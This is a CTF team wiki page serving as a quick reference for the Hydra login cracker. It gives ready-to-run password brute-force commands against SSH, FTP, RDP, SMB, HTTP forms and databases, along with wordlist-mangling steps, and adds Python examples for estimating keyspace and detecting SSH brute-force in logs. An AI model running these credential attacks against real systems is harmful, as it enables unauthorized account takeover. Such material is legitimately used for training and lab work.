
Hydra

From Brunnerne
Revision as of 10:56, 4 August 2025 by The.mikkel

Hydra, often referred to as thc-hydra, is a parallelized network logon cracker. It is an essential tool for any CTF player when faced with a login prompt on a network service. This page serves as a quick reference for common Hydra commands and syntax.

Core Syntax

The basic structure of a Hydra command is: hydra [options] <service>://<target>[:<port>] or, equivalently, hydra [options] <target> <service>

The most critical options define the credential lists:

  • -l <USER>: Specifies a single username.
  • -L <FILE>: Specifies a file containing a list of usernames.
  • -p <PASS>: Specifies a single password.
  • -P <FILE>: Specifies a file containing a list of passwords.
  • -C <FILE>: Colon-separated file format, e.g., "user:pass". Useful if you have paired credentials to test against multiple hosts.
  • -x <MIN:MAX:CHARSET>: Brute-force generation. E.g. -x 1:3:aA1 to try all 1-3 character combinations of lowercase, uppercase, and numbers.

Attack Modes: Dictionary vs. Brute-Force

Hydra supports two main attack methodologies. Understanding the difference is key to using the tool effectively.

Dictionary Attack (Most Common)

A dictionary attack uses a predefined list of potential passwords (a "wordlist" or "dictionary"). This is the most common and efficient way to use Hydra, as it focuses on likely passwords. The quality of your wordlist is the most important factor for success. All commands using the -P or -C flags are performing a dictionary attack.

# This is a dictionary attack using the rockyou.txt wordlist.
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://10.10.10.10

Pure Brute-Force Attack

A pure brute-force attack systematically tries every possible combination of characters for a given length and character set. This is extremely slow and only practical for very short or simple passwords (e.g., 4-digit PINs). This mode is enabled with the -x flag.

# Tries to find a 4-digit numeric PIN for the user 'root'
hydra -l root -x 4:4:1 ssh://10.10.10.10

# Tries all 1 to 3 character lowercase passwords
hydra -l user -x 1:3:a telnet://10.10.10.10
  • Note on Charsets: 1 = digits, a = lowercase letters, A = uppercase letters.
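
To see why -x is only practical for very short passwords, the sketch below (an added example, not part of the original page or of Hydra) counts the candidates a MIN:MAX:CHARSET spec produces, using the a/A/1 charset codes listed under Core Syntax. The attempts-per-second figure is an assumed rate for illustration only.

```python
# Added example (not Hydra's code): size of the search space for -x MIN:MAX:CHARSET.
import string

# Charset codes as listed under Core Syntax; any other character in the
# spec is assumed here to stand for itself.
CODES = {
    "a": string.ascii_lowercase,
    "A": string.ascii_uppercase,
    "1": string.digits,
}

def expand_charset(spec):
    """Return the sorted, de-duplicated characters a CHARSET string denotes."""
    chars = set()
    for c in spec:
        chars.update(CODES.get(c, c))
    return sorted(chars)

def keyspace(x_spec):
    """Total candidates for 'MIN:MAX:CHARSET': sum of n**k for k in MIN..MAX."""
    lo, hi, charset = x_spec.split(":", 2)
    lo, hi = int(lo), int(hi)
    if lo < 1 or hi < lo:
        raise ValueError("need 1 <= MIN <= MAX")
    n = len(expand_charset(charset))
    if n == 0:
        raise ValueError("empty charset")
    return sum(n ** k for k in range(lo, hi + 1))

def worst_case_hours(x_spec, attempts_per_second):
    """Hours needed to exhaust the whole space at an assumed constant rate."""
    return keyspace(x_spec) / attempts_per_second / 3600

if __name__ == "__main__":
    RATE = 50  # assumed attempts per second against a network service
    for spec in ("4:4:1", "1:3:aA1", "8:8:aA1"):
        print(f"-x {spec:8} {keyspace(spec):>18,} candidates, "
              f"{worst_case_hours(spec, RATE):,.1f} h worst case")
```

Each extra character multiplies the space by the charset size, which is why password length does more against online guessing than any single complexity rule.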

Common Command Flags

These flags are used in almost all scenarios to control Hydra's behavior.

  • -t <TASKS>: Number of parallel connections (threads). Default is 16. For CTFs, a higher number like -t 64 is common, but be careful not to DoS the service.
  • -V: Verbose mode. Shows every attempt.
  • -d: Debug mode. Even more verbose.
  • -f or -F: Stop after finding the first valid credential pair. Crucial for speed in CTFs.
  • -o <FILE>: Output found credentials to a file.
  • -s <PORT>: Specify a non-default port for the service.
  • -w <TIME>: Set a maximum time to wait for a response (in seconds).

Protocol-Specific Examples

Below are common commands for services frequently encountered in challenges. We'll assume common wordlists like /usr/share/wordlists/rockyou.txt.

SSH (ssh)

# Single user, password list
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.10.1.23

# User list, single password
hydra -L users.txt -p 'password123' 10.10.1.23 ssh

# User list, password list, on a non-standard port
hydra -L users.txt -P passwords.txt -t 64 -f -s 2222 10.10.1.23 ssh

FTP (ftp)

# Check for anonymous login
hydra -l anonymous -p '' ftp://192.168.1.5

# Brute-force with user and password lists
hydra -L users.txt -P pass.txt ftp://192.168.1.5 -t 32 -f

Telnet (telnet)

# Brute-force a telnet service
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 10.12.110.8 telnet

SMB (smb)

# Brute-force Windows SMB shares
# Note: For SMB, the target is often specified with a /// prefix
hydra -L users.txt -P passwords.txt smb://10.10.14.2

RDP (rdp)

# Brute-force a Remote Desktop Protocol service
hydra -L usernames.list -P rockyou.txt rdp://10.20.30.40 -f

HTTP Basic Authentication

# Brute-force a directory protected by .htaccess
hydra -L users.txt -P pass.txt 192.168.5.15 http-get /admin

HTTP POST Form

This is one of the most common web challenges. You need to inspect the login form to find the parameters.

  1. Step 1: Inspect the form. Go to the login page, open browser developer tools (F12), and look at the Network tab when you submit a failed login. Find the POST request and its Form Data. Let's say you find:
    • Login page: /login.php
    • Username field name: uname
    • Password field name: pword
    • Failure message on the page: Invalid Credentials or Login failed
  2. Step 2: Craft the Hydra command. The syntax is: http-post-form "<login_page>:<form_parameters>:<failure_message>". Use ^USER^ and ^PASS^ as placeholders.
# Example command
hydra -L users.txt -P passwords.txt 10.10.10.10 http-post-form "/login.php:uname=^USER^&pword=^PASS^:F=Invalid Credentials" -V -f
  • Pro Tip: If a successful login is signalled by a redirect (HTTP 302) or a cookie rather than by the absence of a failure message, the syntax changes slightly: use a success condition (S=) in place of F=.
    • On success redirect to /dashboard.php: S=Location: /dashboard.php
    • On success set cookie "sessionID": S=sessionID

Database Services

PostgreSQL (postgres)

# Brute-force PostgreSQL. Default user is often 'postgres'.
hydra -l postgres -P passwords.txt 127.0.0.1 postgres

MySQL (mysql)

# Brute-force MySQL/MariaDB. Default user is often 'root'.
hydra -l root -P passwords.txt 127.0.0.1 mysql

CTF Tips & Best Practices

  • Leveraging Password Hints (Rule-Based Attacks): CTFs often provide hints (e.g., a pet's name, a birth year, a company name). These are not passwords themselves, but "base words". You can use tools like John the Ripper (JtR) or Hashcat to apply mutation rules (mangling) to these base words to generate a powerful, custom password list.
  1. Step 1: Create a file (e.g., hints.txt) with your base words, one per line.
  2. Step 2: Use JtR's --stdout mode to generate variations and save them to a new file.
# This command takes your hint words and applies common password rules (like adding '123', '!', etc.)
john --wordlist=hints.txt --rules=All --stdout > mangled_list.txt
  3. Step 3: Use this new, highly-targeted list with Hydra.
hydra -l someuser -P mangled_list.txt ssh://10.10.10.10
  • Website Wordlists: If the target is a company website, use a tool like CeWL to crawl the site and create a wordlist from its content. This can reveal project names, employee names, and other potential password components.
cewl http://ctf.target.corp -d 2 -w custom_words.txt
  • Start with defaults: Before launching a massive brute-force, always check for default credentials (e.g., admin:admin, root:password, test:test) and anonymous/guest access.
  • Use -f / -F: In a CTF, you usually only need one set of valid credentials. Use this flag to stop Hydra as soon as it finds one to save valuable time.
  • Task Management (-t): A high task count is faster but can also lock you out or crash a fragile service. If you get lots of errors, try lowering the task count. Start with -t 16 and increase if the service seems stable.
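
What the parallel SSH guessing described on this page looks like from the server side, as an added example that is not part of the original page: a sliding-window count of failed logins per source address. The log lines are constructed in OpenSSH's syslog style; the threshold, window and year defaults are assumptions to tune per environment.

```python
# Added example: flag sources with a burst of failed SSH logins.
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample: 8 failures from one source within 2 seconds (many
# parallel connections), plus slow, unrelated failures from another host.
SAMPLE_LOG = "\n".join(
    [f"Aug  4 10:56:0{i // 4} ctf sshd[{2100 + i}]: Failed password for root "
     f"from 10.10.14.7 port {40100 + i} ssh2" for i in range(8)]
    + ["Aug  4 10:57:10 ctf sshd[2200]: Failed password for invalid user bob "
       "from 192.168.1.20 port 50522 ssh2",
       "Aug  4 10:59:40 ctf sshd[2201]: Failed password for invalid user bob "
       "from 192.168.1.20 port 50530 ssh2",
       "Aug  4 11:00:02 ctf sshd[2202]: Accepted password for alice "
       "from 192.168.1.20 port 50541 ssh2"]
)

FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

def flag_sources(log_text, threshold=5, window_s=10, year=2025):
    """Return {ip: peak failures inside one window} for IPs reaching threshold.

    Syslog timestamps carry no year, so one is assumed; a log spanning
    New Year would need splitting first.
    """
    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    peak = defaultdict(int)       # ip -> largest window count seen so far
    for line in log_text.splitlines():
        m = FAILED.match(line)
        if not m:
            continue
        stamp = " ".join(m["ts"].split())  # collapse the padded day field
        ts = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
        q = recent[m["ip"]]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()
        peak[m["ip"]] = max(peak[m["ip"]], len(q))
    return {ip: n for ip, n in peak.items() if n >= threshold}

if __name__ == "__main__":
    print(flag_sources(SAMPLE_LOG))
```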

See Also